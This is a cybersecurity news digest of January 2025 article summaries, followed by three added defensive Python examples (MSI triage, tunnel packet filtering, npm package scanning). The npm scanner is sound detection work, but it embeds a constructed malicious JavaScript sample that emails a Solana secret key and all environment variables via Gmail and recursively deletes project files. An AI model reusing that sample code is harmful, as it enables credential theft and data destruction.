Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12823
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-01-21 10:34:23 | thehackernews | MISCELLANEOUS | HackGATE Revolutionizes Penetration Testing with Enhanced Control | HackGATE introduces a gateway solution that gives customers visibility into and control over penetration-testing traffic, addressing common industry frustrations.
Survey indicates 60% of security professionals find it challenging to measure the success of penetration tests, with 65% relying solely on vendor-provided information.
Traditional pentest reports often leave gaps in understanding, leading to unresolved questions about the scope and thoroughness of security tests.
HackGATE offers real-time visibility, showing detailed security testing traffic and techniques, enhancing tracking and transparency in the testing process.
The platform maps testing activity against guidelines such as OWASP so that coverage and quality can be checked rather than assumed.
A centralized dashboard consolidates data, making it easier for stakeholders to monitor progress and understand key metrics in ethical hacking activities.
Enhanced coordination across globally distributed teams is achieved through a unified interface that ensures consistency and adherence to standards.
HackGATE pushes for a shift from "Trust but Verify" to a more empirical, data-driven verification approach in penetration testing accountability and compliance. | Details |
| 2025-01-21 08:38:06 | theregister | MISCELLANEOUS | Webinar Highlights Shift from Reactive to Proactive Security Strategies | The upcoming webinar, scheduled for January 23, 2025, will address the transition from reactive to proactive security measures in the digital landscape.
Vileen Dhutia from Rubrik and Tim Phillips from The Register will present innovative strategies for enhancing organizational security postures.
The session aims to help organizations identify and mitigate security vulnerabilities before they can be exploited.
Discussions will include building resilient systems capable of adapting to new threats and creating a security-first culture within organizations.
The webinar intends to transform security from being seen as a cost center to a key business enabler.
Practical advice will be offered on implementing effective proactive security strategies to safeguard assets and support business growth.
Participation in the webinar requires prior registration, which is currently open. | Details |
| 2025-01-21 05:51:17 | thehackernews | MALWARE | ValleyRAT Malware Targets Chinese Speakers via Fake Installers | Cybersecurity researchers have identified a ValleyRAT campaign targeting Chinese-speaking regions, including Hong Kong, Taiwan and Mainland China.
The malware is delivered through counterfeit Microsoft Installer (MSI) packages posing as legitimate software.
The rogue MSI uses Windows Installer's CustomAction table to execute the malicious code while installing a benign-looking application as cover.
The payload is concealed in an encrypted archive that is extracted with a hardcoded password; its contents include a rogue DLL and two image files used to stage and execute the malware.
ValleyRAT is a remote access trojan (RAT) that gives the attacker control of the infected host, with capabilities including screenshot capture and event log deletion.
The activity is attributed to Silver Fox, a group that shares tactics with Void Arachne and uses the Winos 4.0 command-and-control framework.
Bundling the malware with legitimate applications lets the campaign blend in with normal software installs and evade detection. | Details |
| 2025-01-21 05:30:48 | thehackernews | CYBERCRIME | CERT-UA Warns of Fraudulent AnyDesk "Security Audit" Requests | The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of scams in which attackers send AnyDesk connection requests posing as CERT-UA security audits.
The attackers impersonate CERT-UA in the connection request, trading on the agency's reputation to talk the victim into granting remote access.
The attack only works if AnyDesk is already installed and running on the victim's system and the attacker knows the target's AnyDesk ID.
CERT-UA stressed that it uses remote access tools such as AnyDesk only by prior agreement arranged through officially approved channels.
The State Service for Special Communications and Information Protection of Ukraine reported 1,042 cyber incidents in 2024, most involving malicious code and intrusions.
The most active threat clusters were UAC-0010, UAC-0050 and UAC-0006, associated with espionage, financial theft and psychological operations.
CERT-UA recommends enabling remote access tools only for the duration of an agreed session and coordinating any such access through official communication channels.
The report also noted cyber operations against Russia aimed at stealing data and disrupting operations, carried out by different actors using different techniques. | Details |
| 2025-01-21 03:04:15 | theregister | MISCELLANEOUS | Balancing AI Innovation With Security in APAC Banks | APAC banks are heavily investing in AI, driving impressive revenue growth and transforming customer engagement and operations.
Over 80% of banks use AI for customer interaction, with significant applications in fraud detection, credit scoring, and personalized services.
Rapid AI adoption has outpaced the security controls around it, creating risks to data privacy and to compliance with stringent regulations.
Open-source components and third-party APIs in AI applications expand the software supply chain a bank has to vet, and each one is a potential point of compromise.
SecOps and data teams often work in silos, so governance gaps appear and security is applied late in the AI application lifecycle.
Banks face challenges like model poisoning and data leakage, highlighting the need for security frameworks tailored to AI.
Strategies such as "AI SecOps" and phased rollouts are recommended to embed security throughout the AI lifecycle, ensuring both innovation and compliance.
Collaboration with cybersecurity experts and the use of AI in enhancing security protocols are essential for maintaining innovation without compromising security. | Details |
| 2025-01-20 19:09:20 | bleepingcomputer | DATA BREACH | HPE Investigates Potential Theft of Critical Source Code | Hewlett Packard Enterprise (HPE) is investigating claims by the threat actor IntelBroker of having stolen HPE source code and other sensitive data.
IntelBroker claims to have accessed HPE's APIs and GitHub repositories and to have obtained private keys, certificates and Docker builds.
HPE has found no evidence of a breach so far but has activated its cyber response protocols, including disabling the related credentials.
The actor has a history of claimed high-profile breaches, including DC Health Link and companies such as Nokia and Cisco.
IntelBroker also offered for sale an archive of data allegedly taken from HPE nearly a year earlier, which would indicate prolonged access if the claim is genuine.
HPE has previously confirmed intrusions by state-sponsored groups, including 2023 access to its email environment by APT29, a group tied to Russian intelligence.
There is no current evidence that the alleged breach has affected HPE's operations or customer data. | Details |
| 2025-01-20 18:59:02 | theregister | NATION STATE ACTIVITY | U.S. Naval War College Analyzes Cyber Warfare Scenarios for Taiwan | The U.S. Naval War College ran a wargame simulating Chinese cyber-attacks on Taiwan, set in a 2030 scenario in which the island seeks UN recognition as an independent state.
Experts and hackers recruited at Black Hat and DEF CON were tasked with finding weaknesses in Taiwan's critical infrastructure and planning cyber responses to combined cyber and physical pressure from China.
Participants produced 65 recommendations to harden Taiwan's infrastructure, highlighting weak points such as the island's reliance on internet cables routed through China.
The scenarios examined the knock-on effects on power, communications and internet infrastructure, with discussion of fallbacks such as satellite links and Bluetooth mesh networks.
Suggested strategies included decentralizing critical infrastructure, stockpiling essential equipment, and training civilians in cybersecurity and network repair.
Other points included co-locating critical sites with irreplaceable cultural artifacts to deter attacks on them, and weighing security in the ongoing replacement of nuclear power with renewable sources.
Taiwanese officials are engaged and showed interest in conducting further, more private wargame sessions in Taiwan to refine defensive strategies. | Details |
| 2025-01-20 15:11:44 | thehackernews | CYBERCRIME | Tunneling Protocol Flaws Expose Millions of Internet Hosts to Attack | New research identifies vulnerabilities in several tunneling protocols: affected hosts accept and forward encapsulated packets without verifying who sent them.
Over 4.2 million hosts, including VPN servers, ISP home routers and CDN nodes, are affected, with large concentrations in China, France and the United States.
Attackers can abuse affected hosts as one-way proxies that inject traffic with a spoofed source, and as amplifiers for denial-of-service (DoS) attacks.
Affected protocols include IP6IP6, GRE6, 4in6 and 6in4; they provide no authentication or encryption of their own, so unless they are wrapped in a layer such as IPsec, any host on the internet can inject packets into the tunnel.
The vulnerabilities have been assigned CVE identifiers, and remediation is recommended as a priority.
Recommended mitigations are to wrap tunnels in IPsec or replace them with WireGuard for authentication and encryption, to accept tunnel packets only from known peers through strict traffic filtering, and to use deep packet inspection to spot unexpected tunneled traffic at network boundaries.
Impacts include network congestion and service disruption, and the spoofing capability can be a stepping stone to further attacks such as man-in-the-middle. | Details |
| 2025-01-20 14:56:13 | thehackernews | MALWARE | DoNot Team Deploys Tanzeem Android Malware for Espionage | The cybersecurity firm Cyfirma discovered a new Android malware named Tanzeem, deployed by DoNot Team, in targeted cyberattacks aimed at intelligence collection.
Tanzeem, named after the Urdu word for "organization," was found in fake chat applications in October and December 2024, featuring similar functionalities with minor UI changes.
The app does not work as a real chat application: once it has obtained the permissions it needs, it closes, leaving the malicious components to run.
DoNot Team, suspected of Indian origins, has historically engaged in cyber espionage using spear-phishing and Android malware to gather sensitive intelligence.
The malware abuses the OneSignal push-notification platform, which researchers suspect is used to deliver phishing links that lead to further malware installs.
On launch the app shows a fake chat screen that asks the user to enable accessibility services, which then lets the malware obtain sensitive permissions and data.
The malware capabilities include tracking call logs, contacts, messages, location details, and external storage contents; it also features screen recording and connects to a C2 server.
The use of push notifications for malware distribution highlights an evolution in DoNot Team’s tactics, potentially indicating ongoing and future espionage activities. | Details |
| 2025-01-20 13:35:16 | theregister | NATION STATE ACTIVITY | Sweden Boosts Baltic Security to Protect Undersea Cables | Sweden has deployed warships in the Baltic Sea to protect against sabotage of undersea cables, crucial for global energy and data flow.
This move follows Sweden's recent entry into NATO, driven by increasing Russian activities that threaten regional security.
The strategic deployment aims to deter covert operations, such as cable cutting, by ensuring military presence and surveillance.
The article recalls the 1981 "Whiskey on the Rocks" incident, when a Soviet submarine ran aground inside Swedish waters and Sweden's military faced down Soviet naval maneuvers.
Sweden's proactive defense and surveillance measures underscore its commitment to protect its territorial waters and critical infrastructure.
The article suggests that robust international policies and cooperation are needed to secure undersea cables as strategic international assets.
It stresses that clear rules and consequences are needed to deter disruption of undersea infrastructure, which underpins global connectivity. | Details |
| 2025-01-20 12:09:12 | theregister | RANSOMWARE | Ransomware Attack Shuts Down UK High School; Remote Learning Implemented | A UK high school in Chester was forced to close due to a ransomware attack on January 17, impacting its operations for at least two days.
Blacon High School has transitioned to remote learning using Google Classroom while the premises remain partially accessible for lunch collection.
No ransomware group has claimed responsibility for the attack, and the school has not confirmed if any data was compromised.
School operations are severely affected, with many IT systems down and phone services disrupted; a temporary phone line has been set up.
Headteacher Rachel Hudson stated that an independent cybersecurity company is investigating the incident to determine the specifics of the breach.
This incident follows another major ransomware attack on Gateshead Council by the Medusa gang, emphasizing increasing cyber threats to the UK public sector.
Discussions are ongoing within the UK government about potentially banning ransom payments by public sector and critical infrastructure bodies.
An upcoming government report is expected to address the vulnerability of public-sector IT systems caused by outdated technology and inadequate funding. | Details |
| 2025-01-20 12:03:52 | thehackernews | NATION STATE ACTIVITY | U.S. Treasury Sanctions Highlight Complex Global Cyber Threats | The U.S. Treasury's Office of Foreign Assets Control (OFAC) issued sanctions against Chinese and North Korean entities involved in cybersecurity threats.
Sichuan Juxinhe Network Technology Co., Ltd. and Shanghai-based actor Yin Kecheng were sanctioned for their links to the Salt Typhoon and Silk Typhoon threat clusters respectively.
Yin was implicated in the recent compromise of the Treasury's own network, disclosed at the end of December 2024.
Additional sanctions targeted individuals and organizations involved in a North Korean IT worker scheme that generates revenue for the regime through fraudulent employment abroad.
The growing complexity of the digital landscape makes it necessary to understand how cybersecurity intersects with national security and diplomacy.
The recap also highlighted a practical guide offering 10 best practices for improving visibility and security in cloud environments.
It closed with a list of recently disclosed vulnerabilities across diverse software and systems, underscoring the need for timely patching and proactive threat management. | Details |
| 2025-01-20 11:12:57 | thehackernews | MISCELLANEOUS | Satori Revolutionizes Data Security From Production to AI | Satori provides comprehensive data security across all types of data within an organization, including operational and semi-structured data.
The platform secures the data lifecycle from creation in production environments to usage in AI models, addressing gaps in legacy data security solutions.
Satori supports fine-grained access control on BI tools, enhancing security over platforms that leave such implementation solely to security teams.
The platform provides continuous data discovery, classification and monitoring, supporting Data Activity Monitoring across multiple data stores.
It automates data security tasks such as policy enforcement and access control in real time, including on platforms that do not natively support advanced access models such as RBAC and ABAC.
It enables dynamic data masking and controlled, time-limited data access to reduce the exposure of sensitive data.
It gives detailed visibility into data access and usage through enriched audit logs and customized reports compatible with major platforms.
Its approach is proactive, moving beyond mapping risk to actively mitigating it through enforced security measures and controls. | Details |
| 2025-01-20 07:25:39 | theregister | DATA BREACH | Sage Temporarily Halts AI Tool to Address Privacy Glitch | Sage Group plc temporarily suspended its AI assistant, Sage Copilot, after it mistakenly shared customer data between users.
The issue was identified when a customer noticed that the AI was displaying invoices from other customer accounts.
Sage characterised the incident as a "minor issue" and stated that no GDPR-sensitive data or invoices were leaked.
The AI system was taken offline for a few hours to investigate and implement a necessary fix.
Sage Copilot, an AI-based tool designed for handling administrative tasks in accounting, was released under early access to a limited user base.
This incident adds to a series of AI-driven errors reported across various industries, emphasizing challenges in AI accuracy and reliability.
Sage reassured that the issue affected only a small number of customers and that corrective measures have been successfully implemented. | Details |
| 2025-01-20 05:49:34 | thehackernews | MALWARE | Malicious Packages Target Solana Wallets, Exploit Trusted Services | Cybersecurity researchers have uncovered malicious npm and PyPI packages designed to steal Solana wallet keys and sensitive data.
Packages such as solana-transaction-toolkit and solana-stable-web-huks mimic legitimate Solana developer tooling but steal private keys and drain wallets by transferring funds to attacker-controlled addresses.
The stolen keys are exfiltrated over Gmail's SMTP servers, a channel chosen because traffic to Gmail is trusted and rarely blocked by security tooling.
Some packages also contain a "kill switch" that deletes project files and exfiltrates environment variables.
Malicious GitHub repositories posing as Solana tools were also identified, extending the campaign to developers who clone code directly from GitHub.
The campaign reaches beyond npm to Python developers, with PyPI packages aimed at capturing Discord authentication tokens.
Security incidents like these highlight the ongoing risk of supply chain attacks where attackers infiltrate legitimate software distribution channels to distribute malware. | Details |
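The ValleyRAT entry above describes a rogue MSI that runs its payload through Windows Installer's CustomAction table. The following is an added triage example, not code from the article or from the ValleyRAT analysis: it decodes the documented bit layout of the CustomAction Type column (base action in the low bits, target source in bits 0x10-0x30, scheduling flags such as deferred 0x400 and NoImpersonate 0x800 above) and flags every row that executes code. The sample rows, action names and severity rule are constructed for illustration; on a real package the rows would be read from its CustomAction table with a tool such as msilib on Windows or msidump on Linux.

```python
"""Decode Windows Installer CustomAction 'Type' values when triaging an MSI.

Added example; not code from the article or from the ValleyRAT analysis.
The bit layout follows the documented CustomAction table. Sample rows below
are constructed for illustration.
"""
from dataclasses import dataclass

# Base action (Type & 0x07): documented msidbCustomActionType* values
BASE = {1: "DLL", 2: "EXE", 3: "TextData", 5: "JScript", 6: "VBScript", 7: "Install"}
# Where the target comes from (Type & 0x30)
SOURCE = {
    0x00: "Binary table",                        # payload embedded in the MSI itself
    0x10: "installed file",                      # a file this package installs
    0x20: "directory (or script text in Target)",
    0x30: "property",                            # path or script held in a property
}
ASYNC, IN_SCRIPT, NO_IMPERSONATE, HIDE_TARGET = 0x80, 0x400, 0x800, 0x2000
CODE_TYPES = {1, 2, 5, 6, 7}  # base types that execute code


@dataclass
class CustomAction:
    action: str     # Action column
    type_code: int  # Type column
    source: str     # Source column (Binary key, File key, Directory or Property)
    target: str     # Target column (entry point, command line, script text, ...)


def decode_type(type_code: int) -> dict:
    """Split a Type value into base action, target source and scheduling flags."""
    base = type_code & 0x07
    deferred = bool(type_code & IN_SCRIPT)
    return {
        "base": BASE.get(base, f"unknown({base})"),
        "source": SOURCE.get(type_code & 0x30, "?"),
        "deferred": deferred,
        # NoImpersonate only has meaning for deferred actions: they run as LocalSystem
        "system_context": deferred and bool(type_code & NO_IMPERSONATE),
        "async": bool(type_code & ASYNC),
        "hidden_target": bool(type_code & HIDE_TARGET),
    }


def executes_code(type_code: int) -> bool:
    """True if the action runs a DLL, EXE, script or nested installer."""
    return (type_code & 0x07) in CODE_TYPES


def triage(rows: list) -> list:
    """Return (action, severity, reason) for every row that executes code.

    Severity is a constructed heuristic: a deferred action with NoImpersonate
    runs as LocalSystem, and EXE/script actions are the shape a dropper uses.
    """
    findings = []
    for ca in rows:
        if not executes_code(ca.type_code):
            continue
        info = decode_type(ca.type_code)
        reasons = [f"{info['base']} from {info['source']}"]
        if info["system_context"]:
            reasons.append("deferred, runs as LocalSystem")
        elif info["deferred"]:
            reasons.append("deferred")
        if info["async"]:
            reasons.append("async (installer does not wait for it)")
        if info["hidden_target"]:
            reasons.append("target hidden from the install log")
        sev = "high" if info["system_context"] or info["base"] != "DLL" else "medium"
        findings.append((ca.action, sev, "; ".join(reasons)))
    return findings


# Constructed CustomAction rows; the first two are ordinary benign shapes
SAMPLE_ROWS = [
    CustomAction("SetTargetDir", 51, "TARGETDIR", "[ProgramFiles64Folder]App"),    # 0x33: set property, no code
    CustomAction("ValidateLicense", 1, "LicenseDll", "CheckLicense"),              # immediate DLL from Binary
    CustomAction("RegisterSvc", 3073, "SvcDll", "Register"),                       # 0xC01: deferred DLL as SYSTEM
    CustomAction("LaunchUpdater", 3106, "INSTALLDIR", "[INSTALLDIR]up.exe /s"),    # 0xC22: deferred EXE as SYSTEM
    CustomAction("RunScript", HIDE_TARGET | 38, "", 'CreateObject("WScript.Shell").Run "..."'),  # VBScript, hidden
]

if __name__ == "__main__":
    for action, sev, why in triage(SAMPLE_ROWS):
        print(f"{sev:6} {action:16} {why}")
```

Rows whose base type is TextData (property or directory assignment) are skipped because they cannot execute anything; everything else is reported, with the deferred-plus-NoImpersonate combination singled out because that is what gives a CustomAction LocalSystem privileges.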
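The tunneling entry above says that affected hosts forward encapsulated packets without checking the sender, and that the fix is to accept tunnel traffic only from known peers. The following is an added example, not from the article or the underlying research: a small model of a tunnel endpoint that parses the outer IPv4 header and the inner IPv6/IPv4/GRE packet, with the vulnerable behaviour (decapsulate and forward anything that looks like a tunnel packet) next to a strict policy that checks the outer source against a peer table and the inner source against that peer's assigned prefix. The peer table, addresses and packets are constructed inline; IP checksums are left at zero because they are not validated here.

```python
"""Model of a 6in4 / IP-in-IP / GRE tunnel endpoint: weak vs strict acceptance.

Added example; not from the article or the research it reports on. Packets and
the peer table are constructed; checksums are zero and not validated.
"""
import ipaddress
import struct

IPPROTO_IPIP, IPPROTO_IPV6, IPPROTO_GRE = 4, 41, 47
ETHERTYPE_IPV4, ETHERTYPE_IPV6 = 0x0800, 0x86DD
TUNNEL_PROTOS = {IPPROTO_IPIP, IPPROTO_IPV6, IPPROTO_GRE}


def parse_ipv4(pkt: bytes):
    """Return (src, dst, proto, payload) for an IPv4 packet."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl:
        raise ValueError("bad IHL")
    return (ipaddress.IPv4Address(pkt[12:16]), ipaddress.IPv4Address(pkt[16:20]),
            pkt[9], pkt[ihl:])


def inner_source(proto: int, payload: bytes):
    """Source address of the encapsulated packet, or None if it cannot be parsed."""
    if proto == IPPROTO_GRE:
        if len(payload) < 4:
            return None
        flags, ptype = struct.unpack("!HH", payload[:4])
        # optional checksum (C), key (K) and sequence (S) fields, 4 bytes each
        off = 4 + 4 * bool(flags & 0x8000) + 4 * bool(flags & 0x2000) + 4 * bool(flags & 0x1000)
        payload = payload[off:]
        proto = {ETHERTYPE_IPV4: IPPROTO_IPIP, ETHERTYPE_IPV6: IPPROTO_IPV6}.get(ptype)
    if proto == IPPROTO_IPIP and len(payload) >= 20 and payload[0] >> 4 == 4:
        return parse_ipv4(payload)[0]
    if proto == IPPROTO_IPV6 and len(payload) >= 40 and payload[0] >> 4 == 6:
        return ipaddress.IPv6Address(payload[8:24])
    return None


def weak_endpoint(pkt: bytes) -> str:
    """The vulnerable shape: any tunnel packet is decapsulated and forwarded."""
    _src, _dst, proto, _payload = parse_ipv4(pkt)
    return "forward" if proto in TUNNEL_PROTOS else "drop: not a tunnel protocol"


def strict_endpoint(pkt: bytes, peers: dict) -> str:
    """Accept only configured peers, and only inner sources that belong to that peer.

    peers maps outer IPv4Address -> (allowed protocol set, list of allowed inner networks).
    """
    src, _dst, proto, payload = parse_ipv4(pkt)
    if proto not in TUNNEL_PROTOS:
        return "drop: not a tunnel protocol"
    if src not in peers:
        return "drop: outer source is not a configured tunnel peer"
    allowed_protos, allowed_nets = peers[src]
    if proto not in allowed_protos:
        return "drop: protocol not enabled for this peer"
    inner = inner_source(proto, payload)
    if inner is None:
        return "drop: inner packet unparseable"
    if not any(inner in net for net in allowed_nets):
        return "drop: inner source outside the peer's prefix"
    return "forward"


def ipv4_hdr(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal IPv4 header (no options, checksum zero) in front of payload."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                       ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed) + payload


def ipv6_hdr(src: str, dst: str) -> bytes:
    """Minimal IPv6 header with next header 59 (no payload)."""
    return struct.pack("!IHBB16s16s", 0x60000000, 0, 59, 64,
                       ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address(dst).packed)


# Constructed configuration: one 6in4 peer that owns 2001:db8:1::/48
PEERS = {ipaddress.IPv4Address("198.51.100.10"): ({IPPROTO_IPV6}, [ipaddress.IPv6Network("2001:db8:1::/48")])}
LOCAL = "203.0.113.1"  # this endpoint's public address (constructed)
INNER = ipv6_hdr("2001:db8:1::5", "2001:db8:ffff::1")
PKT_LEGIT = ipv4_hdr("198.51.100.10", LOCAL, IPPROTO_IPV6, INNER)
PKT_SPOOFED = ipv4_hdr("192.0.2.77", LOCAL, IPPROTO_IPV6, INNER)        # stranger injecting into the tunnel
PKT_WRONG_INNER = ipv4_hdr("198.51.100.10", LOCAL, IPPROTO_IPV6, ipv6_hdr("2001:db8:2::9", "2001:db8:ffff::1"))
PKT_GRE_STRANGER = ipv4_hdr("192.0.2.77", LOCAL, IPPROTO_GRE, struct.pack("!HH", 0, ETHERTYPE_IPV6) + INNER)

if __name__ == "__main__":
    for name, pkt in [("legit", PKT_LEGIT), ("spoofed", PKT_SPOOFED),
                      ("wrong inner", PKT_WRONG_INNER), ("gre stranger", PKT_GRE_STRANGER)]:
        print(f"{name:12} weak={weak_endpoint(pkt):8} strict={strict_endpoint(pkt, PEERS)}")
```

The outer-source check is what the research found missing; the inner-source check matters too, because a legitimate peer can still be used to spoof traffic from addresses it does not own. On a real Linux endpoint the same policy is expressed as firewall rules that accept protocol 41/4/47 only from the peer address and a reverse-path check on the tunnel interface.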
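The Solana entry above describes packages that run at install time, exfiltrate keys and environment variables over Gmail SMTP, and carry a kill switch that deletes project files. The following is an added static-triage example, not code from the article or from the researchers who found the packages: it treats an unpacked npm package as a mapping of file paths to text, reads package.json for lifecycle scripts that execute on install, and flags source files that combine an exfiltration channel with access to wallet secrets or environment variables, or that delete files recursively. The package name "solana-helper-kit", its contents and the scoring rule are constructed to mirror the reported behaviour; the regexes are heuristics, not a detection signature.

```python
"""Heuristic static triage of an unpacked npm package.

Added example; not from the article or the researchers' tooling. The sample
packages below are constructed; "solana-helper-kit" is a hypothetical name.
"""
import json
import re

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")  # run by npm at install time

# indicator category -> (label, regex); categories drive the verdict below
INDICATORS = {
    "exfil": [
        ("gmail smtp host", re.compile(r"smtp\.gmail\.com", re.I)),
        ("nodemailer gmail service", re.compile(r"service\s*:\s*['\"]gmail['\"]", re.I)),
        ("http request to raw IP", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")),
    ],
    "secret": [
        ("solana secret key access", re.compile(r"\bsecretKey\b|Keypair\.fromSecretKey")),
        ("environment enumeration", re.compile(r"JSON\.stringify\(\s*process\.env\s*\)|Object\.(keys|entries)\(\s*process\.env")),
    ],
    "destructive": [
        ("recursive delete", re.compile(r"rmSync\([^)]*recursive\s*:\s*true|rm\s+-rf|rimraf\(")),
    ],
}


def scan_package(files: dict) -> dict:
    """Return install hooks, per-file indicator hits and an overall verdict."""
    hooks, findings, hit_cats = [], [], set()
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE:
            hooks.append(f"{hook}: {cmd}")
    for path, text in files.items():
        if not path.endswith((".js", ".mjs", ".cjs", ".ts")):
            continue
        for cat, rules in INDICATORS.items():
            for label, rx in rules:
                if rx.search(text):
                    findings.append((path, cat, label))
                    hit_cats.add(cat)
    # verdict: a channel out plus something worth stealing, or a destructive
    # action wired to an install hook, is the shape of the reported packages
    if ("exfil" in hit_cats and "secret" in hit_cats) or ("destructive" in hit_cats and hooks):
        verdict = "malicious-likely"
    elif hit_cats or hooks:
        verdict = "review"
    else:
        verdict = "clean"
    return {"install_hooks": hooks, "findings": findings, "verdict": verdict}


# Constructed package mirroring the reported behaviour (hypothetical name)
MALICIOUS_PKG = {
    "package.json": json.dumps({"name": "solana-helper-kit", "version": "1.0.3",
                                "scripts": {"postinstall": "node index.js"}}),
    "index.js": r'''
const nodemailer = require("nodemailer");
const fs = require("fs");
const { Keypair } = require("@solana/web3.js");
// exfiltration through a trusted mail provider
const transport = nodemailer.createTransport({ service: "gmail", auth: { user: "x", pass: "y" } });
function harvest(kp) {
  const body = JSON.stringify({ key: Array.from(kp.secretKey), env: JSON.stringify(process.env) });
  return transport.sendMail({ to: "x", subject: "keys", text: body });
}
// kill switch
if (process.env.TRIGGER === "1") fs.rmSync("./src", { recursive: true, force: true });
module.exports = { harvest };
''',
}
# Constructed benign package for comparison
BENIGN_PKG = {
    "package.json": json.dumps({"name": "tiny-math", "version": "0.1.0"}),
    "index.js": "module.exports = { add: (a, b) => a + b };\n",
}

if __name__ == "__main__":
    for pkg in (MALICIOUS_PKG, BENIGN_PKG):
        print(json.dumps(scan_package(pkg), indent=2))
```

A single hit (a package that legitimately sends mail, or one that cleans a build directory) only lands in "review"; the verdict escalates when an outbound channel co-occurs with secret access, or a destructive action is reachable from a lifecycle hook, which is the combination the reported packages show.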